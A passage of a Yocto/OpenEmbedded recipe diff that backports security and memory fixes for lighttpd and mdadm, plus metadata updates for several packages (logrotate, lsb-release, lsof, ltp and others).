73+ ++chunks_oversized_n;
74+ chunk **co = &chunks_oversized;
75+ while (*co && sz < (*co)->mem->size) co = &(*co)->next;
76+ c->next = *co;
77+ *co = c;
78+ }
79+ else
80+ chunk_free(c);
81+}
82+
83+static buffer * chunk_buffer_acquire_sz(size_t sz) {
84 chunk *c;
85 buffer *b;
86- if (chunks) {
87- c = chunks;
88- chunks = c->next;
89+ if (sz <= chunk_buf_sz) {
90+ if (chunks) {
91+ c = chunks;
92+ chunks = c->next;
93+ }
94+ else
95+ c = chunk_init(chunk_buf_sz);
96+ /* future: might choose to pop from chunks_oversized, if available
97+ * (even if larger than sz) rather than allocating new chunk
98+ * (and if doing so, might replace chunks_oversized_n) */
99 }
100 else {
101- c = chunk_init(chunk_buf_sz);
102+ /*(round up to nearest chunk_buf_sz)*/
103+ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);
104+ c = chunk_pop_oversized(sz);
105+ if (NULL == c)
106+ c = chunk_init(sz);
107 }
108 c->next = chunk_buffers;
109 chunk_buffers = c;
110@@ -137,21 +175,47 @@ buffer * chunk_buffer_acquire(void) {
111 return b;
112 }
113
114+buffer * chunk_buffer_acquire(void) {
115+ return chunk_buffer_acquire_sz(chunk_buf_sz);
116+}
117+
118 void chunk_buffer_release(buffer *b) {
119 if (NULL == b) return;
120- if (b->size >= chunk_buf_sz && chunk_buffers) {
121+ if (chunk_buffers) {
122 chunk *c = chunk_buffers;
123 chunk_buffers = c->next;
124 c->mem = b;
125- c->next = chunks;
126- chunks = c;
127 buffer_clear(b);
128+ if (b->size == chunk_buf_sz) {
129+ c->next = chunks;
130+ chunks = c;
131+ }
132+ else if (b->size > chunk_buf_sz)
133+ chunk_push_oversized(c, b->size);
134+ else
135+ chunk_free(c);
136 }
137 else {
138 buffer_free(b);
139 }
140 }
141
142+size_t chunk_buffer_prepare_append(buffer * const b, size_t sz) {
143+ if (sz > chunk_buffer_string_space(b)) {
144+ sz += b->used ? b->used : 1;
145+ buffer * const cb = chunk_buffer_acquire_sz(sz);
146+ /* swap buffer contents and copy original b->ptr into larger b->ptr */
147+ /*(this does more than buffer_move())*/
148+ buffer tb = *b;
149+ *b = *cb;
150+ *cb = tb;
151+ if ((b->used = tb.used))
152+ memcpy(b->ptr, tb.ptr, tb.used);
153+ chunk_buffer_release(cb);
154+ }
155+ return chunk_buffer_string_space(b);
156+}
157+
158 static chunk * chunk_acquire(size_t sz) {
159 if (sz <= chunk_buf_sz) {
160 if (chunks) {
161@@ -162,13 +226,10 @@ static chunk * chunk_acquire(size_t sz) {
162 sz = chunk_buf_sz;
163 }
164 else {
165- sz = (sz + 8191) & ~8191uL;
166- /* future: might have buckets of certain sizes, up to socket buf sizes*/
167- if (chunks_oversized && chunks_oversized->mem->size >= sz) {
168- chunk *c = chunks_oversized;
169- chunks_oversized = c->next;
170- return c;
171- }
172+ /*(round up to nearest chunk_buf_sz)*/
173+ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);
174+ chunk *c = chunk_pop_oversized(sz);
175+ if (c) return c;
176 }
177
178 return chunk_init(sz);
179@@ -183,10 +244,7 @@ static void chunk_release(chunk *c) {
180 }
181 else if (sz > chunk_buf_sz) {
182 chunk_reset(c);
183- chunk **co = &chunks_oversized;
184- while (*co && sz < (*co)->mem->size) co = &(*co)->next;
185- c->next = *co;
186- *co = c;
187+ chunk_push_oversized(c, sz);
188 }
189 else {
190 chunk_free(c);
191@@ -205,6 +263,7 @@ void chunkqueue_chunk_pool_clear(void)
192 chunk_free(c);
193 }
194 chunks_oversized = NULL;
195+ chunks_oversized_n = 0;
196 }
197
198 void chunkqueue_chunk_pool_free(void)
199diff --git a/src/chunk.h b/src/chunk.h
200index 4c6b7e4..93f343c 100644
201--- a/src/chunk.h
202+++ b/src/chunk.h
203@@ -50,6 +50,8 @@ typedef struct {
204 buffer * chunk_buffer_acquire(void);
205 void chunk_buffer_release(buffer *b);
206
207+size_t chunk_buffer_prepare_append (buffer *b, size_t sz);
208+
209 void chunkqueue_chunk_pool_clear(void);
210 void chunkqueue_chunk_pool_free(void);
211
212diff --git a/src/http-header-glue.c b/src/http-header-glue.c
213index d54f00c..2231fba 100644
214--- a/src/http-header-glue.c
215+++ b/src/http-header-glue.c
216@@ -1267,7 +1267,7 @@ handler_t http_response_read(server *srv, connection *con, http_response_opts *o
217 if (avail < toread) {
218 /*(add avail+toread to reduce allocations when ioctl EOPNOTSUPP)*/
219 avail = avail ? avail - 1 + toread : toread;
220- buffer_string_prepare_append(b, avail);
221+ avail = chunk_buffer_prepare_append(b, avail);
222 }
223
224 n = read(fd, b->ptr+buffer_string_length(b), avail);
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch
new file mode 100644
index 0000000000..da59b7297a
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch
@@ -0,0 +1,100 @@
1From 27103f3f8b1a2857aa45b889e775435f7daf141f Mon Sep 17 00:00:00 2001
2From: povcfe <povcfe@qq.com>
3Date: Wed, 5 Jan 2022 11:11:09 +0000
4Subject: [PATCH] [mod_extforward] fix out-of-bounds (OOB) write (fixes #3134)
5
6(thx povcfe)
7
8(edited: gstrauss)
9
10There is a potential remote denial of service in lighttpd mod_extforward
11under specific, non-default and uncommon 32-bit lighttpd mod_extforward
12configurations.
13
14Under specific, non-default and uncommon lighttpd mod_extforward
15configurations, a remote attacker can trigger a 4-byte out-of-bounds
16write of value '-1' to the stack. This is not believed to be exploitable
17in any way beyond triggering a crash of the lighttpd server on systems
18where the lighttpd server has been built 32-bit and with compiler flags
19which enable a stack canary -- gcc/clang -fstack-protector-strong or
20-fstack-protector-all, but bug not visible with only -fstack-protector.
21
22With standard lighttpd builds using -O2 optimization on 64-bit x86_64,
23this bug has not been observed to cause adverse behavior, even with
24gcc/clang -fstack-protector-strong.
25
26For the bug to be reachable, the user must be using a non-default
27lighttpd configuration which enables mod_extforward and configures
28mod_extforward to accept and parse the "Forwarded" header from a trusted
29proxy. At this time, support for RFC7239 Forwarded is not common in CDN
30providers or popular web server reverse proxies. It bears repeating that
31for the user to desire to configure lighttpd mod_extforward to accept
32"Forwarded", the user must also be using a trusted proxy (in front of
33lighttpd) which understands and actively modifies the "Forwarded" header
34sent to lighttpd.
35
36lighttpd natively supports RFC7239 "Forwarded"
37hiawatha natively supports RFC7239 "Forwarded"
38
39nginx can be manually configured to add a "Forwarded" header
40https://www.nginx.com/resources/wiki/start/topics/examples/forwarded/
41
42A 64-bit build of lighttpd on x86_64 (not known to be affected by bug)
43in front of another 32-bit lighttpd will detect and reject a malicious
44"Forwarded" request header, thereby thwarting an attempt to trigger
45this bug in an upstream 32-bit lighttpd.
46
47The following servers currently do not natively support RFC7239 Forwarded:
48nginx
49apache2
50caddy
51node.js
52haproxy
53squid
54varnish-cache
55litespeed
56
57Given the general dearth of support for RFC7239 Forwarded in popular
58CDNs and web server reverse proxies, and given the prerequisites in
59lighttpd mod_extforward needed to reach this bug, the number of lighttpd
60servers vulnerable to this bug is estimated to be vanishingly small.
61Large systems using reverse proxies are likely running 64-bit lighttpd,
62which is not known to be adversely affected by this bug.
63
64In the future, it is desirable for more servers to implement RFC7239
65Forwarded. lighttpd developers would like to thank povcfe for reporting
66this bug so that it can be fixed before more CDNs and web servers
67implement RFC7239 Forwarded.
68
69x-ref:
70 "mod_extforward plugin has out-of-bounds (OOB) write of 4-byte -1"
71 https://redmine.lighttpd.net/issues/3134
72 (not yet written or published)
73 CVE-2022-22707
74
75Upstream-Status: Backport
76CVE: CVE-2022-22707
77Signed-off-by: Ross Burton <ross.burton@arm.com>
78
79Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
80Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
81---
82 src/mod_extforward.c | 2 +-
83 1 file changed, 1 insertion(+), 1 deletion(-)
84
85diff --git a/src/mod_extforward.c b/src/mod_extforward.c
86index ba957e04..fdaef7f6 100644
87--- a/src/mod_extforward.c
88+++ b/src/mod_extforward.c
89@@ -715,7 +715,7 @@ static handler_t mod_extforward_Forwarded (request_st * const r, plugin_data * c
90 while (s[i] == ' ' || s[i] == '\t') ++i;
91 if (s[i] == ';') { ++i; continue; }
92 if (s[i] == ',') {
93- if (j >= (int)(sizeof(offsets)/sizeof(int))) break;
94+ if (j >= (int)(sizeof(offsets)/sizeof(int))-1) break;
95 offsets[++j] = -1; /*("offset" separating params from next proxy)*/
96 ++i;
97 continue;
98--
992.25.1
100
diff --git a/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch
new file mode 100644
index 0000000000..fd75ca6e26
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch
@@ -0,0 +1,35 @@
1From 2e08ee1d404e308f15551277e92b7605ddfa96a8 Mon Sep 17 00:00:00 2001
2From: Glenn Strauss <gstrauss@gluelogic.com>
3Date: Fri, 29 Nov 2019 18:18:52 -0500
4Subject: [PATCH] default chunk size 8k (was 4k)
5
6Upstream-Status: Backport
7Comment: No hunk refreshed
8https://git.lighttpd.net/lighttpd/lighttpd1.4/commit/304e46d4f808c46cbb025edfacf2913a30ce8855
9Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
10---
11 src/chunk.c | 4 ++--
12 1 file changed, 2 insertions(+), 2 deletions(-)
13
14diff --git a/src/chunk.c b/src/chunk.c
15index 09dd3f1..133308f 100644
16--- a/src/chunk.c
17+++ b/src/chunk.c
18@@ -25,7 +25,7 @@
19 #define DEFAULT_TEMPFILE_SIZE (1 * 1024 * 1024)
20 #define MAX_TEMPFILE_SIZE (128 * 1024 * 1024)
21
22-static size_t chunk_buf_sz = 4096;
23+static size_t chunk_buf_sz = 8192;
24 static chunk *chunks, *chunks_oversized;
25 static chunk *chunk_buffers;
26 static array *chunkqueue_default_tempdirs = NULL;
27@@ -33,7 +33,7 @@ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
28
29 void chunkqueue_set_chunk_size (size_t sz)
30 {
31- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 4096;
32+ chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192;
33 }
34
35 void chunkqueue_set_tempdirs_default_reset (void)
diff --git a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
index 7a255ce2f2..357a269015 100644
--- a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
+++ b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Lightweight high-performance web server" 1SUMMARY = "Lightweight high-performance web server"
2HOMEPAGE = "http://www.lighttpd.net/" 2HOMEPAGE = "http://www.lighttpd.net/"
3DESCRIPTION = "Lightweight high-performance web server is designed and optimized for high performance environments. With a small memory footprint compared to other web-servers, effective management of the cpu-load, and advanced feature set (FastCGI, SCGI, Auth, Output-Compression, URL-Rewriting and many more)"
3BUGTRACKER = "http://redmine.lighttpd.net/projects/lighttpd/issues" 4BUGTRACKER = "http://redmine.lighttpd.net/projects/lighttpd/issues"
4 5
5LICENSE = "BSD-3-Clause" 6LICENSE = "BSD-3-Clause"
@@ -13,10 +14,13 @@ RRECOMMENDS_${PN} = "lighttpd-module-access \
13 lighttpd-module-accesslog" 14 lighttpd-module-accesslog"
14 15
15SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.tar.xz \ 16SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.tar.xz \
17 file://0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch \
16 file://index.html.lighttpd \ 18 file://index.html.lighttpd \
17 file://lighttpd.conf \ 19 file://lighttpd.conf \
18 file://lighttpd \ 20 file://lighttpd \
19 file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \ 21 file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \
22 file://default-chunk-size-8k.patch \
23 file://0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch \
20 " 24 "
21 25
22SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03" 26SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03"
diff --git a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
index 17f4bf4617..7c1b77add8 100644
--- a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
+++ b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
@@ -1,6 +1,7 @@
1SUMMARY = "Rotates, compresses, removes and mails system log files" 1SUMMARY = "Rotates, compresses, removes and mails system log files"
2SECTION = "console/utils" 2SECTION = "console/utils"
3HOMEPAGE = "https://github.com/logrotate/logrotate/issues" 3HOMEPAGE = "https://github.com/logrotate/logrotate/"
4DESCRIPTION = "The logrotate utility is designed to simplify the administration of log files on a system which generates a lot of log files."
4LICENSE = "GPLv2" 5LICENSE = "GPLv2"
5 6
6# TODO: Document coreutils dependency. Why not RDEPENDS? Why not busybox? 7# TODO: Document coreutils dependency. Why not RDEPENDS? Why not busybox?
@@ -21,6 +22,9 @@ SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/${PV}/${BP}.tar.xz
21SRC_URI[md5sum] = "afe109afea749c306ff489203fde6beb" 22SRC_URI[md5sum] = "afe109afea749c306ff489203fde6beb"
22SRC_URI[sha256sum] = "491fec9e89f1372f02a0ab66579aa2e9d63cac5178dfa672c204c88e693a908b" 23SRC_URI[sha256sum] = "491fec9e89f1372f02a0ab66579aa2e9d63cac5178dfa672c204c88e693a908b"
23 24
25# These CVEs are debian, gentoo or SUSE specific on the way logrotate was installed/used
26CVE_CHECK_WHITELIST += "CVE-2011-1548 CVE-2011-1549 CVE-2011-1550"
27
24PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)}" 28PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)}"
25 29
26PACKAGECONFIG[acl] = ",,acl" 30PACKAGECONFIG[acl] = ",,acl"
diff --git a/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch
new file mode 100644
index 0000000000..f32cd18370
--- /dev/null
+++ b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch
@@ -0,0 +1,27 @@
1lsb-release maintains it's own copy of help2man. Include the support
2for specifying SOURCE_DATE_EPOCH from upstream.
3
4Upstream-Status: Pending
5
6Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
7
8diff --git a/help2man b/help2man
9index 13015c2..63439db 100755
10--- a/help2man
11+++ b/help2man
12@@ -173,7 +173,14 @@ my ($help_text, $version_text) = map {
13 or die "$this_program: can't get `--$_' info from $ARGV[0]\n"
14 } qw(help), $opt_version_key;
15
16-my $date = strftime "%B %Y", localtime;
17+my $epoch_secs = time;
18+if (exists $ENV{SOURCE_DATE_EPOCH} and $ENV{SOURCE_DATE_EPOCH} =~ /^(\d+)$/)
19+{
20+ $epoch_secs = $1;
21+ $ENV{TZ} = 'UTC0';
22+}
23+
24+my $date = strftime "%B %Y", localtime $epoch_secs;
25 (my $program = $ARGV[0]) =~ s!.*/!!;
26 my $package = $program;
27 my $version;
diff --git a/meta/recipes-extended/lsb/lsb-release_1.4.bb b/meta/recipes-extended/lsb/lsb-release_1.4.bb
index 3e8f7a13ec..bafc18fcc0 100644
--- a/meta/recipes-extended/lsb/lsb-release_1.4.bb
+++ b/meta/recipes-extended/lsb/lsb-release_1.4.bb
@@ -11,6 +11,7 @@ LIC_FILES_CHKSUM = "file://README;md5=12da544b1a3a5a1795a21160b49471cf"
11SRC_URI = "${SOURCEFORGE_MIRROR}/project/lsb/lsb_release/1.4/lsb-release-1.4.tar.gz \ 11SRC_URI = "${SOURCEFORGE_MIRROR}/project/lsb/lsb_release/1.4/lsb-release-1.4.tar.gz \
12 file://0001-fix-lsb_release-to-work-with-busybox-head-and-find.patch \ 12 file://0001-fix-lsb_release-to-work-with-busybox-head-and-find.patch \
13 file://0001-Remove-timestamp-from-manpage.patch \ 13 file://0001-Remove-timestamp-from-manpage.patch \
14 file://help2man-reproducibility.patch \
14 " 15 "
15 16
16SRC_URI[md5sum] = "30537ef5a01e0ca94b7b8eb6a36bb1e4" 17SRC_URI[md5sum] = "30537ef5a01e0ca94b7b8eb6a36bb1e4"
diff --git a/meta/recipes-extended/lsof/lsof_4.91.bb b/meta/recipes-extended/lsof/lsof_4.91.bb
index b3adfd57af..7c85bf23fc 100644
--- a/meta/recipes-extended/lsof/lsof_4.91.bb
+++ b/meta/recipes-extended/lsof/lsof_4.91.bb
@@ -3,7 +3,7 @@ DESCRIPTION = "Lsof is a Unix-specific diagnostic tool. \
3Its name stands for LiSt Open Files, and it does just that." 3Its name stands for LiSt Open Files, and it does just that."
4HOMEPAGE = "http://people.freebsd.org/~abe/" 4HOMEPAGE = "http://people.freebsd.org/~abe/"
5SECTION = "devel" 5SECTION = "devel"
6LICENSE = "BSD" 6LICENSE = "Spencer-94"
7LIC_FILES_CHKSUM = "file://00README;beginline=645;endline=679;md5=964df275d26429ba3b39dbb9f205172a" 7LIC_FILES_CHKSUM = "file://00README;beginline=645;endline=679;md5=964df275d26429ba3b39dbb9f205172a"
8 8
9# Upstream lsof releases are hosted on an ftp server which times out download 9# Upstream lsof releases are hosted on an ftp server which times out download
diff --git a/meta/recipes-extended/ltp/ltp_20200120.bb b/meta/recipes-extended/ltp/ltp_20200120.bb
index 6633755a20..505b7b14fc 100644
--- a/meta/recipes-extended/ltp/ltp_20200120.bb
+++ b/meta/recipes-extended/ltp/ltp_20200120.bb
@@ -29,7 +29,7 @@ CFLAGS_append_powerpc64 = " -D__SANE_USERSPACE_TYPES__"
29CFLAGS_append_mipsarchn64 = " -D__SANE_USERSPACE_TYPES__" 29CFLAGS_append_mipsarchn64 = " -D__SANE_USERSPACE_TYPES__"
30SRCREV = "4079aaf264d0e9ead042b59d1c5f4e643620d0d5" 30SRCREV = "4079aaf264d0e9ead042b59d1c5f4e643620d0d5"
31 31
32SRC_URI = "git://github.com/linux-test-project/ltp.git \ 32SRC_URI = "git://github.com/linux-test-project/ltp.git;branch=master;protocol=https \
33 file://0001-build-Add-option-to-select-libc-implementation.patch \ 33 file://0001-build-Add-option-to-select-libc-implementation.patch \
34 file://0003-Check-if-__GLIBC_PREREQ-is-defined-before-using-it.patch \ 34 file://0003-Check-if-__GLIBC_PREREQ-is-defined-before-using-it.patch \
35 file://0004-guard-mallocopt-with-__GLIBC__.patch \ 35 file://0004-guard-mallocopt-with-__GLIBC__.patch \
diff --git a/meta/recipes-extended/lzip/lzip_1.21.bb b/meta/recipes-extended/lzip/lzip_1.21.bb
index bb3d2a6fe3..bd1c007de6 100644
--- a/meta/recipes-extended/lzip/lzip_1.21.bb
+++ b/meta/recipes-extended/lzip/lzip_1.21.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Lossless data compressor based on the LZMA algorithm" 1SUMMARY = "Lossless data compressor based on the LZMA algorithm"
2HOMEPAGE = "http://lzip.nongnu.org/lzip.html" 2HOMEPAGE = "http://lzip.nongnu.org/lzip.html"
3DESCRIPTION = "Lzip is a lossless data compressor with a user interface similar to the one of gzip or bzip2. Lzip uses a simplified form of the Lempel-Ziv-Markov chain-Algorithm (LZMA) stream format, chosen to maximize safety and interoperability."
3SECTION = "console/utils" 4SECTION = "console/utils"
4LICENSE = "GPLv2+" 5LICENSE = "GPLv2+"
5LIC_FILES_CHKSUM = "file://COPYING;md5=76d6e300ffd8fb9d18bd9b136a9bba13 \ 6LIC_FILES_CHKSUM = "file://COPYING;md5=76d6e300ffd8fb9d18bd9b136a9bba13 \
diff --git a/meta/recipes-extended/man-db/man-db_2.9.0.bb b/meta/recipes-extended/man-db/man-db_2.9.0.bb
index 333fbfa76d..7a30f9d722 100644
--- a/meta/recipes-extended/man-db/man-db_2.9.0.bb
+++ b/meta/recipes-extended/man-db/man-db_2.9.0.bb
@@ -1,5 +1,6 @@
1SUMMARY = "An implementation of the standard Unix documentation system accessed using the man command" 1SUMMARY = "An implementation of the standard Unix documentation system accessed using the man command"
2HOMEPAGE = "http://man-db.nongnu.org/" 2HOMEPAGE = "http://man-db.nongnu.org/"
3DESCRIPTION = "man-db is an implementation of the standard Unix documentation system accessed using the man command. It uses a Berkeley DB database in place of the traditional flat-text whatis databases."
3LICENSE = "LGPLv2.1 & GPLv2" 4LICENSE = "LGPLv2.1 & GPLv2"
4LIC_FILES_CHKSUM = "file://docs/COPYING.LIB;md5=a6f89e2100d9b6cdffcea4f398e37343 \ 5LIC_FILES_CHKSUM = "file://docs/COPYING.LIB;md5=a6f89e2100d9b6cdffcea4f398e37343 \
5 file://docs/COPYING;md5=eb723b61539feef013de476e68b5c50a" 6 file://docs/COPYING;md5=eb723b61539feef013de476e68b5c50a"
diff --git a/meta/recipes-extended/mc/mc_4.8.23.bb b/meta/recipes-extended/mc/mc_4.8.23.bb
index ead348b92e..8e3b7a65e0 100644
--- a/meta/recipes-extended/mc/mc_4.8.23.bb
+++ b/meta/recipes-extended/mc/mc_4.8.23.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Midnight Commander is an ncurses based file manager" 1SUMMARY = "Midnight Commander is an ncurses based file manager"
2HOMEPAGE = "http://www.midnight-commander.org/" 2HOMEPAGE = "http://www.midnight-commander.org/"
3DESCRIPTION = "GNU Midnight Commander is a visual file manager, licensed under GNU General Public License and therefore qualifies as Free Software. It's a feature rich full-screen text mode application that allows you to copy, move and delete files and whole directory trees, search for files and run commands in the subshell. Internal viewer and editor are included."
3LICENSE = "GPLv3" 4LICENSE = "GPLv3"
4LIC_FILES_CHKSUM = "file://COPYING;md5=270bbafe360e73f9840bd7981621f9c2" 5LIC_FILES_CHKSUM = "file://COPYING;md5=270bbafe360e73f9840bd7981621f9c2"
5SECTION = "console/utils" 6SECTION = "console/utils"
diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch
new file mode 100644
index 0000000000..8e0a06cbc7
--- /dev/null
+++ b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch
@@ -0,0 +1,77 @@
1From ced5fa8b170ad448f4076e24a10c731b5cfb36ce Mon Sep 17 00:00:00 2001
2From: Blazej Kucman <blazej.kucman@intel.com>
3Date: Fri, 3 Dec 2021 15:31:15 +0100
4Subject: mdadm: block creation with long names
5
6This fixes buffer overflows in create_mddev(). It prohibits
7creation with not supported names for DDF and native. For IMSM,
8mdadm will do silent cut to 16 later.
9
10Signed-off-by: Mariusz Tkaczyk <mariusz.tkaczyk@linux.intel.com>
11Signed-off-by: Blazej Kucman <blazej.kucman@intel.com>
12Signed-off-by: Jes Sorensen <jsorensen@fb.com>
13---
14
15Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=ced5fa8b170ad448f4076e24a10c731b5cfb36ce]
16CVE: CVE-2023-28736
17Signed-off-by: Ashish Sharma <asharma@mvista.com>
18
19 mdadm.8.in | 5 +++++
20 mdadm.c | 9 ++++++++-
21 mdadm.h | 5 +++++
22 3 files changed, 18 insertions(+), 1 deletion(-)
23
24diff --git a/mdadm.8.in b/mdadm.8.in
25index 28d773c2..68e100cb 100644
26--- a/mdadm.8.in
27+++ b/mdadm.8.in
28@@ -2186,6 +2186,11 @@ is run, but will be created by
29 .I udev
30 once the array becomes active.
31
32+The max length md-device name is limited to 32 characters.
33+Different metadata types have more strict limitation
34+(like IMSM where only 16 characters are allowed).
35+For that reason, long name could be truncated or rejected, it depends on metadata policy.
36+
37 As devices are added, they are checked to see if they contain RAID
38 superblocks or filesystems. They are also checked to see if the variance in
39 device size exceeds 1%.
40diff --git a/mdadm.c b/mdadm.c
41index 91e67467..26299b2e 100644
42--- a/mdadm.c
43+++ b/mdadm.c
44@@ -1359,9 +1359,16 @@ int main(int argc, char *argv[])
45 mdfd = open_mddev(devlist->devname, 1);
46 if (mdfd < 0)
47 exit(1);
48- } else
49+ } else {
50+ char *bname = basename(devlist->devname);
51+
52+ if (strlen(bname) > MD_NAME_MAX) {
53+ pr_err("Name %s is too long.\n", devlist->devname);
54+ exit(1);
55+ }
56 /* non-existent device is OK */
57 mdfd = open_mddev(devlist->devname, 0);
58+ }
59 if (mdfd == -2) {
60 pr_err("device %s exists but is not an md array.\n", devlist->devname);
61 exit(1);
62diff --git a/mdadm.h b/mdadm.h
63index 54567396..c7268a71 100644
64--- a/mdadm.h
65+++ b/mdadm.h
66@@ -1880,3 +1880,8 @@ enum r0layout {
67 #define INVALID_SECTORS 1
68 /* And another special number needed for --data_offset=variable */
69 #define VARIABLE_OFFSET 3
70+
71+/**
72+ * This is true for native and DDF, IMSM allows 16.
73+ */
74+#define MD_NAME_MAX 32
75--
76cgit
77
diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch
new file mode 100644
index 0000000000..1e2990d79a
--- /dev/null
+++ b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch
@@ -0,0 +1,80 @@
1From 7d374a1869d3a84971d027a7f4233878c8f25a62 Mon Sep 17 00:00:00 2001
2From: Mateusz Grzonka <mateusz.grzonka@intel.com>
3Date: Tue, 27 Jul 2021 10:25:18 +0200
4Subject: Fix memory leak after "mdadm --detail"
5
6Signed-off-by: Mateusz Grzonka <mateusz.grzonka@intel.com>
7Signed-off-by: Jes Sorensen <jsorensen@fb.com>
8---
9Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=7d374a1869d3a84971d027a7f4233878c8f25a62]
10CVE: CVE-2023-28938
11Signed-off-by: Ashish Sharma <asharma@mvista.com>
12
13 Detail.c | 20 +++++++++-----------
14 1 file changed, 9 insertions(+), 11 deletions(-)
15
16diff --git a/Detail.c b/Detail.c
17index ad56344f..d3af0ab5 100644
18--- a/Detail.c
19+++ b/Detail.c
20@@ -66,11 +66,11 @@ int Detail(char *dev, struct context *c)
21 int spares = 0;
22 struct stat stb;
23 int failed = 0;
24- struct supertype *st;
25+ struct supertype *st = NULL;
26 char *subarray = NULL;
27 int max_disks = MD_SB_DISKS; /* just a default */
28 struct mdinfo *info = NULL;
29- struct mdinfo *sra;
30+ struct mdinfo *sra = NULL;
31 struct mdinfo *subdev;
32 char *member = NULL;
33 char *container = NULL;
34@@ -93,8 +93,7 @@ int Detail(char *dev, struct context *c)
35 if (!sra) {
36 if (md_get_array_info(fd, &array)) {
37 pr_err("%s does not appear to be an md device\n", dev);
38- close(fd);
39- return rv;
40+ goto out;
41 }
42 }
43 external = (sra != NULL && sra->array.major_version == -1 &&
44@@ -108,16 +107,13 @@ int Detail(char *dev, struct context *c)
45 sra->devs == NULL) {
46 pr_err("Array associated with md device %s does not exist.\n",
47 dev);
48- close(fd);
49- sysfs_free(sra);
50- return rv;
51+ goto out;
52 }
53 array = sra->array;
54 } else {
55 pr_err("cannot get array detail for %s: %s\n",
56 dev, strerror(errno));
57- close(fd);
58- return rv;
59+ goto out;
60 }
61 }
62
63@@ -827,10 +823,12 @@ out:
64 close(fd);
65 free(subarray);
66 free(avail);
67- for (d = 0; d < n_devices; d++)
68- free(devices[d]);
69+ if (devices)
70+ for (d = 0; d < n_devices; d++)
71+ free(devices[d]);
72 free(devices);
73 sysfs_free(sra);
74+ free(st);
75 return rv;
76 }
77
78--
79cgit
80
diff --git a/meta/recipes-extended/mdadm/mdadm_4.1.bb b/meta/recipes-extended/mdadm/mdadm_4.1.bb
index 001d3331a7..ca326fd1cb 100644
--- a/meta/recipes-extended/mdadm/mdadm_4.1.bb
+++ b/meta/recipes-extended/mdadm/mdadm_4.1.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Tool for managing software RAID under Linux" 1SUMMARY = "Tool for managing software RAID under Linux"
2HOMEPAGE = "http://www.kernel.org/pub/linux/utils/raid/mdadm/" 2HOMEPAGE = "http://www.kernel.org/pub/linux/utils/raid/mdadm/"
3DESCRIPTION = "mdadm is a Linux utility used to manage and monitor software RAID devices."
3 4
4# Some files are GPLv2+ while others are GPLv2. 5# Some files are GPLv2+ while others are GPLv2.
5LICENSE = "GPLv2 & GPLv2+" 6LICENSE = "GPLv2 & GPLv2+"
@@ -23,6 +24,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/utils/raid/mdadm/${BPN}-${PV}.tar.xz \
23 file://0001-mdadm-add-option-y-for-use-syslog-to-recive-event-re.patch \ 24 file://0001-mdadm-add-option-y-for-use-syslog-to-recive-event-re.patch \
24 file://include_sysmacros.patch \ 25 file://include_sysmacros.patch \
25 file://0001-mdadm-skip-test-11spare-migration.patch \ 26 file://0001-mdadm-skip-test-11spare-migration.patch \
27 file://CVE-2023-28736.patch \
28 file://CVE-2023-28938.patch \
26 " 29 "
27 30
28SRC_URI[md5sum] = "51bf3651bd73a06c413a2f964f299598" 31SRC_URI[md5sum] = "51bf3651bd73a06c413a2f964f299598"
diff --git a/meta/recipes-extended/mingetty/mingetty_1.08.bb b/meta/recipes-extended/mingetty/mingetty_1.08.bb
index 491b892093..9822e86b0e 100644
